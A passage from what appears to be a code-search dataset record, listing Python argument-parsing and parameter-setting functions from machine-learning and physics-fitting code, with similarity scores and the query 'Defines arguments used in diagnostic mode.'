norm')\t\n\tparser.add_argument('--batch_first', type=str, default='True', help='batch as the first dimension')\n\tparser.add_argument('--use_gpu', type=str, default='False', help='whether or not using GPU')\n\tparser.add_argument('--eval_with_mask', type=str, default='True', help='calc loss excluding padded words')\n\tparser.add_argument('--scheduled_sampling', type=str, default='False', \\\n\t\t\t\t\t \t\thelp='gradually turn off teacher forcing \\\n\t\t\t\t\t \t\t(if True, use teacher_forcing_ratio as the starting point)')\n\n\t# teacher forcing / attention forcing / dual\n\tparser.add_argument('--train_mode', type=str, default='dual', help='train mode; multi | dual | afdynamic')\n\tparser.add_argument('--load_tf', type=str, default=None, help='used with train_mode=af; tf model load dir')\n\tparser.add_argument('--teacher_forcing_ratio', type=float, default=1.0, help='ratio of teacher forcing')\n\tparser.add_argument('--attention_forcing', type=str, default='False', help='whether or not using attention forcing')\n\tparser.add_argument('--attention_loss_coeff', type=float, default=1.0, \\\n\t\t\t\t\t\t\thelp='attention loss coeff, ignored if attention_forcing=False')\n\t\n\t# save and print\n\tparser.add_argument('--checkpoint_every', type=int, default=10, help='save ckpt every n steps')\t\n\tparser.add_argument('--print_every', type=int, default=10, help='print every n steps')\t\n\n\treturn parser", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def args():\n\n parser = argparse.ArgumentParser(description=\"Train a maximum entropy model.\")\n parser.add_argument(\"-N\", \"--ngram\", metavar=\"N\", dest=\"ngram\", type=int, default=3, help=\"The length of ngram to be considered (default 3).\")\n parser.add_argument(\"datafile\", type=str,\n help=\"The file name containing the features.\")\n parser.add_argument(\"modelfile\", type=str,\n help=\"The name of the file to which you write the trained model.\")\n args = parser.parse_args()\n\n return args.datafile, args.ngram, args.modelfile", "def __init__(self, *args, **kwargs):\n self.classes = [0,1] # (default to 0/1; replace during training)\n self.theta = np.array([]) # placeholder value before training\n\n if len(args) or len(kwargs): # if we were given optional arguments,\n self.train(*args,**kwargs) # just pass them through to \"train\"", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def parse_args ( self , dataset = None , *args , **kwargs ) :\n _args = []\n for a in args :\n if not isinstance ( a , ROOT.RooCmdArg ) :\n self.error ( 'parse_args: unknown argument type %s/%s, skip' % ( a , type ( a ) ) )\n else : _args.append ( a ) \n\n from ostap.plotting.fit_draw import keys as drawing_options\n\n silent = None\n verbose = None\n \n for k , a in items_loop ( kwargs ) :\n \n klow = k.lower ().replace('_','')\n kup = k.upper ().replace('_','')\n \n ## skip \"drawing\" options \n if klow in drawing_options : continue \n if klow in ( 'draw' ,\n 'drawoption' ,\n 'drawoptions' ) : continue \n \n if isinstance ( a , ROOT.RooCmdArg ) : _args.append ( a )\n \n elif kup in ( 'VERBOSE' , ) and isinstance ( a , bool ) :\n \n if not verbose is None :\n if a != verbose : \n logger.warning ( 'parse_args: Redefine VERBOSE to %s' % a ) \n verbose = a \n if not silent is None :\n if a == silent :\n logger.warning ( 'parse_args: confusing VERBOSE/SILENT %s/%s' % ( a , silent ) )\n silent = not a \n _args.append ( ROOT.RooFit.Verbose ( a ) )\n elif kup in ( 'SILENT' ,\n 'SILENCE' ) and isinstance ( a , bool ) :\n if not silent is None :\n if a != silent : \n logger.warning ( 'parse_args: Redefine SILENT to %s' % a ) \n verbose = a \n if not verbose is None :\n if a == verbose :\n logger.warning ( 'parse_args: confusing SILENT/VERBOSE %s/%s' % ( a , verbose ) )\n verbose = not a\n _args.append ( ROOT.RooFit.Verbose ( not a ) ) \n elif kup in ( 'STRATEGY' , \n 'MINUITSTRATEGY' ,\n 'STRATEGYMINUIT' ) and isinstance ( a , integer_types ) and 0 <= a <= 2 : \n _args.append ( ROOT.RooFit.Strategy ( a ) ) \n elif kup in ( 'PRINTLEVEL' ,\n 'MINUITPRINT' ,\n 'MINUITLEVEL' ) and isinstance ( a , integer_types ) and -1 <= a <= 3 :\n _args.append ( ROOT.RooFit.PrintLevel ( a ) ) \n elif kup in ( 'PRINTEVALERRORS' ,\n 'PRINTERRORS' ,\n 'ERRORSPRINT' ) and isinstance ( a , integer_types ) and -1 <= a :\n _args.append ( ROOT.RooFit.PrintEvalErrors ( a ) ) \n elif kup in ( 'TIMER' ,\n 'TIMING' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Timer ( a ) ) \n elif kup in ( 'WARNING' ,\n 'WARNINGS' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Warnings ( a ) ) \n \n elif kup in ( 'SUMW2' ,\n 'SUMW2ERR' ,\n 'SUMW2ERROR' ,\n 'SUMW2ERRORS' ) and isinstance ( a , bool ) :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: SumW2-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: SumW2-flag is False for weighted dataset') \n\n _args.append ( ROOT.RooFit.SumW2Error( a ) )\n \n elif kup in ( 'ASYMPTOTIC' ,\n 'ASYMPTOTICERR' ,\n 'ASYMPTOTICERROR' ,\n 'ASYMPTOTICERRORS' ) and isinstance ( a , bool ) and 61900 <= root_version_int :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: AsymptoticError-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: AsymptoticError-flag is False for weighted dataset') \n\n if a and root_version_int < 62006 :\n self.warning (\"``Asymptotic=True'' will crash if Title!=Name (ROOT-10668)\")\n \n _args.append ( ROOT.RooFit.AsymptoticError ( a ) )\n \n elif kup in ( 'BATCH' ,\n 'BATCHMODE' ) and isinstance ( a , bool ) and 62000 <= root_version_int :\n _args.append ( ROOT.RooFit.BatchMode ( a ) ) \n elif kup in ( 'EXTENDED' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Extended ( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and isinstance ( a , int ) and 1<= a : \n _args.append ( ROOT.RooFit.NumCPU( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and \\\n isinstance ( a , list_types ) and 2 == len ( a ) and \\\n isinstance ( a[0] , integer_types ) and 1 <= a[1] and \\\n isinstance ( a[1] , integer_types ) and 0 <= a[1] <=3 :\n _args.append ( ROOT.RooFit.NumCPU( a[0] , a[1] ) ) \n \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ,\n 'RANGES' ,\n 'FITRANGES' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.Range ( a ) ) \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , num_types ) \\\n and isinstance ( a[1] , num_types ) \\\n and a[0] < a[1] : \n _args.append ( ROOT.RooFit.Range ( a[0] , a[1] ) )\n elif kup in ( 'MINIMIZER' , ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , string_types ) \\\n and isinstance ( a[1] , string_types ) :\n _args.append ( ROOT.RooFit.Minimizer ( a[0] , a[1] ) ) \n elif kup in ( 'HESSE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Hesse ( a ) )\n elif kup in ( 'INITIALHESSE' ,\n 'INITHESSE' ,\n 'HESSEINIT' ,\n 'HESSEINITIAL' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.InitialHesse ( a ) )\n elif kup in ( 'OPTIMIZE' ,\n 'OPTIMISE' ) and isinstance ( a , integer_types ) :\n _args.append ( ROOT.RooFit.Optimize ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , ROOT.RooArgSet ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , string_types ) \\\n and hasattr ( self , 'params' ) and a in self.params ( dataset ) : \n _v = self.params()[ a ]\n _s = ROOT.RooArgSet ( _v )\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) ) \n elif kup in ( 'MINOS' , ) and not isinstance ( a , string_types ) :\n\n _s = ROOT.RooArgSet()\n _pars = self.params ( dataset ) if hasattr ( self , 'params' ) else ROOT.RooArgSet() \n for v in a :\n if v in _pars and isinstance ( v , string_types ):\n _v = _pars [ v ] \n _s.add ( _v )\n elif v in _pars and isinstance ( v , ROOT.RooAbsArg ) :\n _s.add ( v )\n else :\n self.error ( \"Can not find %s in parameetrs\" % v )\n\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) )\n \n elif kup in ( 'SAVE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Save ( a ) )\n elif kup in ( 'CLONE' ,\n 'CLONEDATA' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.CloneData ( a ) )\n elif kup in ( 'OFFSET' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Offset ( a ) )\n elif kup in ( 'FITOPTIONS' ,\n 'FITOPTION' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.FitOptions ( a ) )\n \n elif kup in ( 'CONSTRAINT' ,\n 'CONSTRAINTS' ,\n 'PARS' ,\n 'PARAMS' ,\n 'PARAMETER' ,\n 'PARAMETERS' ) :\n c = self.parse_constraints ( a )\n if c is None : self.error ('parse_args: Invalid constraint specification: %s/%s' % ( a , type ( a ) ) )\n else : _args.append ( c ) \n \n else :\n \n self.error ( 'parse_args: Unknown/illegal keyword argument: %s/%s, skip it ' % ( k , type ( a ) ) )\n \n \n if not check_arg ( 'numcpu' , *_args ) :\n if dataset and not isinstance ( dataset , ROOT.RooDataHist ) :\n _args.append ( ncpu ( len ( dataset ) ) )\n else :\n nc = numcpu()\n if 1 < nc : _args.append ( ROOT.RooFit.NumCPU ( nc ) )\n\n \n # =============================================================\n ## check options for the weighted datasets \n if dataset :\n \n weighted = dataset.isWeighted () \n sw2 = check_arg ( 'SumW2Error' , *_args )\n aer = check_arg ( 'AsymptoticError' , *_args )\n\n if sw2 and aer :\n logger.warning ( \"parse_args: Both ``SumW2Error'' and ``AsymptoticError'' are specified\" ) \n if weighted and sw2 :\n value = bool ( sw2.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'SumW2=False' is specified for the weighted dataset!\")\n elif weighted and aer : \n value = bool ( aer.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'AsymptoticError=False' is specified for the weighted dataset!\")\n ## elif weighted : \n ## logger.warning ( \"parse_args: Neither ``SumW2Error'' and ``AsymptoticError'' are specified for weighted dataset! ``SumW2=True'' is added\" )\n ## _args.append ( ROOT.RooFit.SumW2Error ( True ) ) \n elif not weighted and sw2 :\n logger.warning ( \"parse_args:``SumW2Error'' is specified for non-weighted dataset\" )\n elif not weighted and aer :\n logger.warning ( \"parse_args:``AsymptoticError'' is specified for non-weighted dataset\" )\n\n keys = [ str ( a ) for a in _args ]\n keys.sort ()\n \n ## check presence of \"non-trivial\" keys\n kset = set( keys ) \n kset.discard ( 'Save' ) ## trivial\n kset.discard ( 'NumCPU' ) ## trivial\n kset.discard ( 'Verbose' ) ## trivial \n kset.discard ( 'Timer' ) ## trivial \n kset.discard ( 'PrintLevel' ) ## trivial\n\n ## duplicates? \n if len ( kset ) != len ( keys ) :\n self.warning (\"duplicated options!\") \n #\n if kset : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n else : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n\n\n ## store them \n self.aux_keep.append ( _args ) \n \n return self.merge_args ( 5 , *_args )", "def add_val_arguments(self):\n self.add_test_arguments()", "def test_arguments(self):\n\n h.test_function_arguments(\n func=ScalingTransformer.fit,\n expected_arguments=[\"self\", \"X\", \"y\"],\n expected_default_values=(None,),\n )", "def __getinitargs__(self):\n return (self.cutout,)", "def predict(self, xs, **kwargs):", "def add_args(parser):\n parser.add_argument(\"data\", metavar=\"FILE\", help=\"file prefix for data\")\n parser.add_argument(\n \"--num-classes0\",\n type=int,\n default=-1,\n help=\"number of classes0\",\n )\n parser.add_argument(\"--no-shuffle\", action=\"store_true\", default=False)", "def paraChck(**kwargs):\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val", "def get_random_arguments(cls, coding_receptors=None, **kwargs):\n args = super(PrimacyCodingMixin, cls).get_random_arguments(**kwargs)\n \n if coding_receptors is None:\n coding_receptors = np.random.randint(1, 3)\n \n args['parameters']['coding_receptors'] = coding_receptors\n\n return args", "def setup_args(cls, parser):\n pass", "def add_arguments(self, parser):", "def train_dagger(): # add arguments as needed\n pass", "def mpl_patch_arguments(self):\n raise NotImplementedError()", "def train_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', type = str, help = 'Path to the data directory') \n parser.add_argument('--lr', type = float, default = 0.001, help = 'Learning rate (0.001)') \n parser.add_argument('--model', type = str, default = 'vgg16', help = 'TorchVision VGG model used: vgg19 or (vgg16)') \n parser.add_argument('--hidden', type = int, default = 4096, help = 'Number of hidden units (4096)') \n parser.add_argument('--epochs', type = int, default = 8, help = 'Number of training epochs (8)') \n parser.add_argument('--gpu', type = bool, default = True, help = '(True) = GPU enabled, False = GPU disabled') \n parser.add_argument('--chk', type = str, default = 'checkpoint', help = 'Checkpoint folder name') \n return parser.parse_args()", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"resnet based fcn Network\")\n parser.add_argument(\"--epochs\", type=int, default=epochs)\n parser.add_argument(\"--image_size\", type=int, default=image_size)\n parser.add_argument(\"--learning_rate\", type=float, default=learning_rate)\n return parser.parse_args()", "def set_params(self, **kwargs):\n ...", "def setParams(self, *, predictionCol=\"prediction\", labelCol=\"label\",\n metricName=\"meanAveragePrecision\", k=10):\n kwargs = self._input_kwargs\n return self._set(**kwargs)", "def _set_arguments(self):\n self._arguments = []", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. \"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def optional_parameters(self):\n return ['bunches', 'target_thickness']", "def add_env_args(parser):\n # sawyer\n parser.add_argument(\n \"--reward_type\",\n type=str,\n default=\"dense\",\n choices=[\"dense\", \"sparse\"],\n help=\"reward type\",\n )\n parser.add_argument(\n \"--distance_threshold\",\n type=float,\n default=0.06,\n help=\"distance threshold for termination\",\n )\n parser.add_argument(\n \"--max_episode_steps\",\n type=int,\n default=70,\n help=\"maximum timesteps in an episode\",\n )\n parser.add_argument(\n \"--camera_name\",\n type=str,\n default=\"visview\",\n help=\"camera name in an environment\",\n )\n\n # observations\n parser.add_argument(\n \"--frame_skip\", type=int, default=1, help=\"Numer of skip frames\"\n )\n parser.add_argument(\n \"--action_repeat\", type=int, default=1, help=\"number of action repeats\"\n )\n parser.add_argument(\n \"--ctrl_reward_coef\", type=float, default=0, help=\"control reward coefficient\"\n )\n\n parser.add_argument(\n \"--kp\", type=float, default=40.0, help=\"p term for a PID controller\"\n ) # 150.)\n parser.add_argument(\n \"--kd\", type=float, default=8.0, help=\"d term for a PID controller\"\n ) # 20.)\n parser.add_argument(\n \"--ki\", type=float, default=0.0, help=\"i term for a PID controller\"\n )\n parser.add_argument(\n \"--frame_dt\", type=float, default=0.15, help=\"delta t between each frame\"\n ) # 0.1)\n parser.add_argument(\n \"--use_robot_indicator\",\n type=eval,\n default=False,\n help=\"enable visualization of robot indicator for motion planner\",\n )\n parser.add_argument(\n \"--use_target_robot_indicator\",\n type=eval,\n default=False,\n help=\"enable visualization of robot indicator for target position of motion planner\",\n )\n parser.add_argument(\n \"--success_reward\", type=float, default=150.0, help=\"completion reward\"\n )\n parser.add_argument(\n \"--contact_threshold\",\n type=float,\n default=-0.002,\n help=\"depth thredhold for contact\",\n )\n parser.add_argument(\n \"--joint_margin\", type=float, default=0.001, help=\"marin of each joint\"\n )\n parser.add_argument(\"--task_level\", type=str, default=\"easy\")\n parser.add_argument(\n \"--step_size\",\n type=float,\n default=0.02,\n help=\"step size for invalid target handling\",\n )\n # puck\n parser.add_argument(\"--puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--puck_mass\", type=float, default=0.01)\n parser.add_argument(\"--source_env_puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--source_env_puck_mass\", type=float, default=0.01)\n parser.add_argument(\"--target_env_puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--target_env_puck_mass\", type=float, default=0.01)\n\n parser.add_argument(\"--env_ob_source\", type=str2bool, default=False)\n parser.add_argument(\"--end_effector\", type=str2bool, default=True)\n parser.add_argument(\"--ik_target\", type=str, default=\"grip_site\")\n parser.add_argument(\n \"--action_range\", type=float, default=0.1, help=\"range of radian\"\n )\n parser.add_argument(\"--dr\", type=str2bool, default=False)\n parser.add_argument(\"--dr_params_set\", type=str, default=\"IP_large_range\")\n\n parser.add_argument(\"--mod_env_params\", type=str2bool, default=False)\n parser.add_argument(\"--param_mod_instructions\", type=eval, default=[])\n\n parser.add_argument(\"--unity\", type=str2bool, default=False)\n parser.add_argument(\"--unity_editor\", type=str2bool, default=False)\n parser.add_argument(\"--virtual_display\", type=str, default=\":1\")\n parser.add_argument(\"--port\", type=int, default=4000)\n\n # FetchReach action\n parser.add_argument(\"--action_rotation_degrees\", type=float, default=0.0)\n parser.add_argument(\"--action_z_bias\", type=float, default=0.0)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"model_weights\", type=str,\n help=\"Path to the file with model weights.\")\n parser.add_argument(\"--save_dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n return parser.parse_args()", "def add_train_args(parser: ArgumentParser):\n # General arguments\n parser.add_argument('--task', type=str, default='regression',\n help='Regression or classification task')\n parser.add_argument('--seed', type=int, default=0,\n help='Random seed to use when splitting data into train/val/test sets.'\n 'When `num_folds` > 1, the first fold uses this seed and all'\n 'subsequent folds add 1 to the seed.')\n parser.add_argument('--data_path', type=str,\n help='Path to data CSV file')\n parser.add_argument('--split_path', type=str,\n help='Path to .npy file containing train/val/test split indices')\n parser.add_argument('--log_dir', type=str, default=None,\n help='Directory where model checkpoints will be saved')\n parser.add_argument('--model_path', type=str, default=None,\n help='Path to model file to load for evaluation time')\n parser.add_argument('--eval_output_dir', type=str, default=None,\n help='Directory to store outputs of evaluation, including predictions and attention visualization')\n\n\n # Training arguments\n parser.add_argument('--epoch', type=int, default=0,\n help='Starting epoch')\n parser.add_argument('--checkpoint_load_path', type=str,\n help='Path to model to load as checkpoint when resuming training')\n parser.add_argument('--checkpoint_dir', type=str,\n help='Path to save checkpoint model')\n parser.add_argument('--viz_dir', type=str,\n help='Path to save attention visualization')\n\n parser.add_argument('--n_epochs', type=int, default=60,\n help='Number of epochs to run')\n parser.add_argument('--batch_size', type=int, default=50,\n help='Batch size')\n parser.add_argument('--warmup_epochs', type=float, default=2.0,\n help='Number of epochs during which learning rate increases linearly from'\n 'init_lr to max_lr. Afterwards, learning rate decreases exponentially'\n 'from max_lr to final_lr.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='Learning rate')\n parser.add_argument('--num_workers', type=int, default=5,\n help='Number of workers to use in dataloader')\n parser.add_argument('--no_shuffle', action='store_true', default=False,\n help='Whether or not to retain default ordering during training')\n parser.add_argument('--shuffle_pairs', action='store_true', default=False,\n help='Whether or not to shuffle only pairs of stereoisomers')\n\n # Model arguments\n parser.add_argument('--gnn_type', type=str,\n choices=['gin', 'gcn', 'dmpnn', 'orig_dmpnn'],\n help='Type of gnn to use')\n parser.add_argument('--global_chiral_features', action='store_true', default=False,\n help='Use global chiral atom features')\n parser.add_argument('--chiral_features', action='store_true', default=False,\n help='Use local chiral atom features')\n parser.add_argument('--ft_boost', action='store_true', default=False, help='whether to concatenate R/S features after each MP layer')\n parser.add_argument('--hidden_size', type=int, default=32,\n help='Dimensionality of hidden layers')\n parser.add_argument('--depth', type=int, default=2,\n help='Number of message passing steps')\n parser.add_argument('--dropout', type=float, default=0.,\n help='Dropout probability')\n parser.add_argument('--graph_pool', type=str, default='sum',\n choices=['sum', 'mean', 'max', 'attn', 'set2set'],\n help='How to aggregate atom representations to molecule representation')\n parser.add_argument('--message', type=str, default='sum',\n choices=['sum', 'tetra_pd', 'tetra_permute', 'tetra_permute_concat'],\n help='How to pass neighbor messages')\n parser.add_argument('--n_layers', type=int, default=2,\n help='Number of final FFN layers')\n parser.add_argument('--skip_coef', type=float, default=1.,\n help='How much information retained in skip connections')\n\n # Attention arguments\n parser.add_argument('--attn_type', type=str, default='gat', choices=['gat', 'tang'],\n help='Attention type. GAT or that used in Tang 2020')\n parser.add_argument('--gat_act', type=str, default='leakyrelu',\n choices=['leakyrelu', 'relu'], help='Activation function used in GAT')\n parser.add_argument('--alpha', type=float, default=0.01,\n help='Alpha used in leakyReLU in GAT')\n parser.add_argument('--gat_depth', type=int, default=2,\n help='number of GAT attention layers')\n parser.add_argument('--heads', type=int, default=3,\n help='Number of attention heads')\n parser.add_argument('--attn_dropout', type=float, default=0.,\n help='Dropout probability for attention')\n parser.add_argument('--concat', action='store_true', default=False,\n help='concatenate heads or take average in multihead attention')", "def buildbertargs(): # type: () -> ClassificationArgs\n\n accargs = ClassificationArgs()\n accargs.num_train_epochs = 5\n accargs.fp16 = False\n accargs.overwrite_output_dir = True\n accargs.evaluate_during_training = False\n accargs.sliding_window = True\n accargs.max_seq_length = 256\n accargs.stride = 0.9\n accargs.labels_list = [1, 0]\n accargs.save_model_every_epoch = False\n accargs.silent = True\n accargs.manual_seed = 18\n\n return accargs", "def parse_args(mode=None):\n parser = ArgumentParser()\n if mode == \"train\":\n parser.add_train_arguments()\n elif mode == \"trainval\":\n parser.add_train_val_arguments()\n elif mode == \"val\":\n parser.add_val_arguments()\n elif mode == \"test\":\n parser.add_test_arguments()\n else:\n raise ValueError(\n \"build_argparser received incorrect mode.\"\n \" Possible modes: ('train', 'trainval', 'val', 'test').\"\n )\n return vars(parser.parse_args())", "def set_params(self, **kwargs):\n if 'nbins' in kwargs:\n self._nbins = kwargs['nbins']\n if self._nbins != 'auto':\n self._nbins = int(self._nbins)\n if 'symmetric' in kwargs:\n self._symmetric = kwargs['symmetric']\n if 'prune' in kwargs:\n prune = kwargs['prune']\n if prune is not None and prune not in ['upper', 'lower', 'both']:\n raise ValueError(\n \"prune must be 'upper', 'lower', 'both', or None\")\n self._prune = prune\n if 'min_n_ticks' in kwargs:\n self._min_n_ticks = max(1, kwargs['min_n_ticks'])\n if 'steps' in kwargs:\n steps = kwargs['steps']\n if steps is None:\n self._steps = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10]\n else:\n self._steps = self._validate_steps(steps)\n self._extended_steps = self._staircase(self._steps)\n if 'integer' in kwargs:\n self._integer = kwargs['integer']", "def add_arguments(parser):\n # add onset detection related options to the existing parser\n g = parser.add_argument_group('save/load the activations')\n # add options for saving and loading the activations\n g.add_argument('--save', action='store_true', default=False,\n help='save the activations to file')\n g.add_argument('--load', action='store_true', default=False,\n help='load the activations from file')\n g.add_argument('--sep', action='store', default=None,\n help='separator for saving/loading the activations '\n '[default: None, i.e. numpy binary format]')\n # return the argument group so it can be modified if needed\n return g", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--mode\", default=MODE, choices=[\"train\", \"test\"])\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--img_folder\",type=str, default='images',help=\"save the predicted landmarks\")\n \n return parser.parse_args()", "def analysis_config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-g\", \"--ground-truth\", type=str, default=\"./BRUTE_FORCE_near_duplicates.tsv\")\n parser.add_argument(\"-p\", \"--pred\", type=str, default=\"./PRED_near_duplicates.tsv\")\n\n return parser.parse_args()", "def __init__(self, *args, **kwargs):\n self._observation_space = kwargs['observation_space']\n self._action_space = kwargs['action_space']\n self._seed = kwargs['seed']\n self._lr = kwargs['lr']\n self._gamma = kwargs['gamma']\n self._batch_size = kwargs['batch_size']\n\n if self._seed:\n from drl.tools.misc_util import set_seeds\n set_seeds(self._seed)\n\n #TODO:OpenAI baselines has helpers for the observation inputs..\n # this time we go ham on the class, but this could be made automatically\n #here" ]
[ "0.68575656", "0.68137014", "0.6691477", "0.6603834", "0.65638775", "0.65195256", "0.6398639", "0.6300945", "0.6298256", "0.6298256", "0.6298256", "0.6298256", "0.6298256", "0.62570894", "0.6243932", "0.6173412", "0.61286485", "0.6126391", "0.61123145", "0.61077875", "0.6099914", "0.60748315", "0.60170245", "0.60137916", "0.60081416", "0.6001194", "0.5997912", "0.59434474", "0.5912657", "0.5909036", "0.5908049", "0.58711874", "0.5857059", "0.58491665", "0.58371425", "0.58318585", "0.5830273", "0.5827019", "0.58225965", "0.58085966", "0.5802229", "0.5795602", "0.5781326", "0.57773894", "0.57732224", "0.57712245", "0.5768483", "0.57589245", "0.5747975", "0.57445544", "0.57341003", "0.573301", "0.57292217", "0.5723413", "0.5717178", "0.5712532", "0.57085377", "0.5707619", "0.5707257", "0.5691704", "0.5673521", "0.56726044", "0.566044", "0.56571764", "0.5656356", "0.5655374", "0.5655004", "0.5652481", "0.5650193", "0.56498194", "0.56436664", "0.56381893", "0.5636141", "0.56336045", "0.5630526", "0.5621709", "0.5621143", "0.5618081", "0.56122905", "0.561163", "0.5610805", "0.56085026", "0.56085014", "0.55974525", "0.5596085", "0.5586932", "0.55863315", "0.5583598", "0.55829763", "0.55829084", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.55818504", "0.5577333", "0.5570365" ]
0.0
-1
Defines arguments used in diagnostic mode.
